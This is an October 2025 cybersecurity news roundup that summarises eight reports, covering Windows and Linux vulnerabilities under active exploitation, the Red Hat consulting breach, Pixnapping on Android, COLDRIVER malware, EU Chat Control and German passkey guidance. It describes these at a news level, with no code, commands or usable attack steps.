1. Windows Zero-Day Actively Exploited to Target European Diplomats
Two distinct and highly severe Microsoft Windows vulnerabilities are currently under active exploitation, posing a significant risk to users globally. The first is an unpatched Windows Shortcut zero-day (CVE-2025-9491) that has been secretly exploited by multiple nation-state APT groups for espionage since 2017, with a China-aligned group recently using it to target European diplomats by hiding the PlugX malware in malicious shortcut files. The second is a critical, potentially wormable flaw in the Windows Server Update Services (WSUS) component (CVE-2025-59287), which Microsoft struggled to patch correctly in its October update but is now being opportunistically exploited in the wild to drop information-stealing malware onto unpatched, internet-facing servers.
| Date: | Oct 31, 2025 |
|---|---|
| Source: | Ars TECHNICA |
| Author: | Dan Goodin |
2. Red Hat Consulting Hit by Data Breach After GitLab Instance is Compromised
The Crimson Collective extortion group claimed responsibility for a security breach at Red Hat, stealing nearly 570GB of data, including around 800 Customer Engagement Reports (CERs), from a self-managed GitLab instance used exclusively by Red Hat Consulting. Red Hat confirmed the breach, stating it has secured the instance and is investigating, but did not verify the full extent of the data theft or the hackers’ claim that the CERs—which can contain sensitive infrastructure details and authentication tokens for major organizations like Bank of America, AT&T, and U.S. government entities—could be used to access downstream customer networks. Red Hat maintains that the security issue is isolated to its consulting business and has not impacted its other products or software supply chain, and is now notifying affected customers.
| Date: | Oct 2, 2025 |
|---|---|
| Source: | The Bleeping Computer |
| Author: | Lawrence Abrams |
3. German Refusal Blocks EU Chat Control Law
In a significant win for digital privacy advocates, the German government refused to support the EU’s controversial Chat Control regulation, effectively blocking the required majority in the EU Council and derailing the proposed mass surveillance law from passing next week. This refusal followed massive public pressure, which caused even conservative leaders like Jens Spahn (CDU/CSU) to publicly oppose the unwarranted monitoring of private chats. Digital rights activist Dr. Patrick Breyer celebrated this victory, crediting it to relentless protest from citizens and organizations, but warned that the fight is “far from over.” He called on EU Commission President Ursula von der Leyen to withdraw the “dystopian” bill entirely and adopt the European Parliament’s alternative, which focuses on effective child protection through “Security by Design” and proactive content clearing instead of mass surveillance.
| Date: | Oct 8, 2025 |
|---|---|
| Source: | Patrick Breyer |
| Author: | Patrick Breyer |
4. New Pixnapping Attack Steals 2FA Codes and Private Data from Android Devices
A new security flaw called Pixnapping allows a malicious app installed on an Android device, to covertly steal sensitive visual data displayed by other apps, such as two-factor authentication (2FA) codes and chat messages.
The attack requires the victim to install a malicious app that needs no special system permissions. Pixnapping works by exploiting a side channel, specifically the time it takes to render a frame, that allows the malicious app to infer the color of individual pixels from the target app, effectively taking a “screenshot” pixel-by-pixel. Researchers demonstrated the attack could steal a 6-digit Google Authenticator code in under 30 seconds on various Pixel models with a success rate up to 73%. While Google released partial mitigations, the researchers found a modified version of the attack still worked.
| Date: | Oct 13, 2025 |
|---|---|
| Source: | Ars Technica |
| Author: | Dan Goodin |
5. CISA: High-severity Linux flaw now exploited by ransomware gangs
The Linux kernel vulnerability, CVE-2024-1086, a high-severity privilege escalation flaw present in the netfilter: nf_tables component, is now being actively exploited in ransomware attacks. The flaw, a use-after-free weakness that has existed in the kernel code since 2014, allows attackers who have already gained local access to escalate their privileges up to root-level access, enabling them to take full control of the compromised system, disable security, and deploy malware. A publicly available proof-of-concept (PoC) exploit was released in March 2024, demonstrating its effectiveness against major distributions like Debian, Ubuntu, and Red Hat.
| Date: | Oct 31, 2025 |
|---|---|
| Source: | Bleeping Computer |
| Author: | Sergiu Gatlan |
6. Russian Coldriver Hackers Rapidly Deploy Three New Malware Families to Evade Detection
COLDRIVER has quickly replaced its previously exposed LOSTKEYS information stealer with a new, rapidly refined collection of malware families, collectively codenamed the “ROBOT” family (including NOROBOT, YESROBOT, and MAYBEROBOT). Observed since May 2025, this new attack chain represents a tactical shift: instead of targeting high-profile individuals for credential theft, the new attacks leverage “ClickFix-style lures” to trick users into executing malicious PowerShell commands via a fake CAPTCHA prompt. The infection begins with an HTML lure dubbed COLDCOPY that drops the NOROBOT DLL, which then executes a subsequent payload, initially a Python backdoor (YESROBOT), later replaced by a more refined PowerShell implant (MAYBEROBOT). This rapid developmental tempo and quick tool replacement (within five days of the LOSTKEYS disclosure) suggest that COLDRIVER is adapting swiftly to security researchers’ public findings.
| Date: | Oct 21, 2025 |
|---|---|
| Source: | The Hacker News |
| Author: | Ravie Lakshmanan |
7. Germany Positions Passkeys as the Nation’s Primary Secure Authentication Standard
Germany’s Federal Cybersecurity Agency Launches Initiative to Mandate Passkey Adoption viewing them as significantly more secure, user-friendly, and resistant to phishing and man-in-the-middle attacks than traditional passwords. The BSI’s plan, detailed in new draft guidelines, seeks to standardize the use of both device-bound and synced passkeys, which leverage unique public and private cryptographic keys to prevent credential reuse and ensure authentication is tied to an approved device. While the BSI acknowledges the challenge of low public familiarity and adoption (only 38% familiar in 2024), it is moving forward, aligning with the industry trend exemplified by companies like Microsoft, which began making passkeys the default for new accounts in May 2025.
| Date: | Oct 01, 2025 |
|---|---|
| Source: | Tech Radar |
| Author: | Craig Hale |
8. The European Cybersecurity Month (ECSM)
This year focused heavily on combating phishing, which remains the primary initial intrusion method in approximately 60% of cyberattacks. The campaign highlighted the evolving nature of phishing, noting the rise of “Phishing-as-a-Service” platforms and the concerning use of Large Language Models (LLMs) and AI to create highly convincing scams, which reportedly accounted for over 80% of observed social engineering activity worldwide by early 2025. Promoting the long-running motto “#THINKB4UCLICK,” the initiative provided up-to-date security information and also served to promote cybersecurity careers to help bridge the sector’s skills gap through events like the European Cybersecurity Challenge.
| Date: | Oct 01, 2025 |
|---|---|
| Source: | European Commission |
| Author: | European Commission |
Conclusion
That wraps up this edition! We’d love to hear your thoughts. Don’t hesitate to share any comments or additional news we might have missed. 